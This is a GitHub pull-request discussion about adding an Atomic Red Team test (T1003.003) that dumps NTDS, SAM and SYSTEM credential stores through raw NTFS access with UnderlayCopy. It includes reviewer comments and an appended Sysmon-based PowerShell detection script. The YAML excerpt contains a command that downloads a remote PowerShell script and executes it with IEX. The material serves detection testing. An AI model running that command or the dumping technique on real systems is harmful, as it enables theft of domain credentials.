Update T1003.003.md & T1003.003.yaml via UnderlayCopy #3217
Conversation
Thank you for this PR @kfallahi. Can you please add screenshots of the execution and cleanup of this atomic via Invoke? That will be of huge help for review. Also, no need to add the .md files next time; these are automatically generated from the yaml files.
atomics/T1003.003/T1003.003.yaml
Outdated
| executor: | ||
| command: | | ||
| [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 | ||
| IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing) |
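Review bot: The `IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)` line fetches and executes whatever currently sits on the `main` branch, so the code the atomic runs can change (or be replaced) after review without any change to this YAML. Pin the raw URL to a specific commit SHA instead of `refs/heads/main`, and move the URL into an input argument so the test can be pointed at a vendored or locally reviewed copy of the script; with an unpinned, hard-coded URL there is no way for a reviewer to tell which version of UnderlayCopy was actually tested.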
Hey @kfallahi, thanks for your contribution. Instead of refs/heads/main, can you tag it to a particular commit ID like
https://github.com/kfallahi/UnderlayCopy/blob/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1 ?
If you could also move this URL to an input argument, it would be great :)
Thanks! I’ve updated it to reference a specific commit ID and moved the URL to an input argument. Please let me know if anything else is needed.
This PR adds an atomic test that demonstrates NTDS Dumping via raw NTFS extraction using UnderlayCopy.
UnderlayCopy extracts protected/locked system artifacts (SAM, SYSTEM, NTDS) by parsing $MFT and/or mapping clusters via filesystem metadata. This atomic helps validate detections for raw-volume and MFT-based acquisition techniques.
Atomic: Copy NTDS in low level NTFS acquisition (MFT and fsutil method)
ATT&CK mapping: T1003.003
Executor: powershell
References: https://github.com/kfallahi/UnderlayCopy
I can add additional atomics for SAM and SYSTEM (mapped to T1003.002) if maintainers prefer.
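The PR description says the atomic exists to validate detections for raw-volume and MFT-based acquisition. As an added detection-side example (not part of this PR, the atomic, or the UnderlayCopy project), the PowerShell below pulls Sysmon Event ID 9 (RawAccessRead) records and flags raw volume reads made by processes outside an allowlist; the allowlist entries and the embedded sample record are constructed assumptions, and the field names follow the Sysmon event schema.

```powershell
# Added example, not from the PR or UnderlayCopy. Flags Sysmon Event ID 9
# (RawAccessRead) records where a process outside an assumed allowlist reads a
# raw NTFS volume, which is what MFT/cluster-based acquisition of ntds.dit,
# SAM or SYSTEM looks like at the event-log level.

# Assumed allowlist: legitimate raw-volume readers on a typical DC. Tune per host.
$AllowedImages = @(
    'C:\Windows\System32\vssvc.exe',
    'C:\Windows\System32\wbengine.exe'
)

function ConvertFrom-SysmonXml {
    # Turn one Sysmon event (as returned by EventLogRecord.ToXml()) into a flat object.
    param([Parameter(Mandatory)][xml]$Xml)
    $data = @{}
    foreach ($d in $Xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        UtcTime   = $data['UtcTime']
        ProcessId = $data['ProcessId']
        Image     = $data['Image']
        Device    = $data['Device']
        User      = $data['User']
    }
}

function Get-RawAccessReadEvents {
    # Live query of the Sysmon operational log, Event ID 9 only.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 9
    } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertFrom-SysmonXml ([xml]$_.ToXml()) }
}

function Find-SuspiciousRawReads {
    # \Device\HarddiskVolumeN is the raw NTFS volume; a read of it from anything
    # not on the allowlist is the signal a raw-volume dump test should trigger.
    param([Parameter(ValueFromPipeline)]$Event)
    process {
        if ($Event.Device -like '\Device\HarddiskVolume*' -and
            $AllowedImages -notcontains $Event.Image) {
            $Event
        }
    }
}

# Constructed sample record (not captured from a real host) in the XML shape
# Sysmon writes, so the logic can be exercised without Sysmon installed.
$SampleXml = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>9</EventID></System>
  <EventData>
    <Data Name="UtcTime">2024-01-01 10:00:00.000</Data>
    <Data Name="ProcessId">4212</Data>
    <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="Device">\Device\HarddiskVolume3</Data>
    <Data Name="User">CORP\admin</Data>
  </EventData>
</Event>
'@

# Offline run against the constructed record: the powershell.exe read is flagged.
ConvertFrom-SysmonXml ([xml]$SampleXml) | Find-SuspiciousRawReads | Format-Table -AutoSize

# Live run on a host with Sysmon (RawAccessRead logging enabled in the config):
# Get-RawAccessReadEvents | Find-SuspiciousRawReads | Format-Table -AutoSize
```

Sysmon only records Event ID 9 when the configuration includes a RawAccessRead rule, so if the live query returns nothing after running the atomic, check the Sysmon config before concluding the technique is invisible. The allowlist is deliberately short; Windows Backup and VSS are the usual benign raw readers, and anything else reading the volume that holds ntds.dit deserves triage.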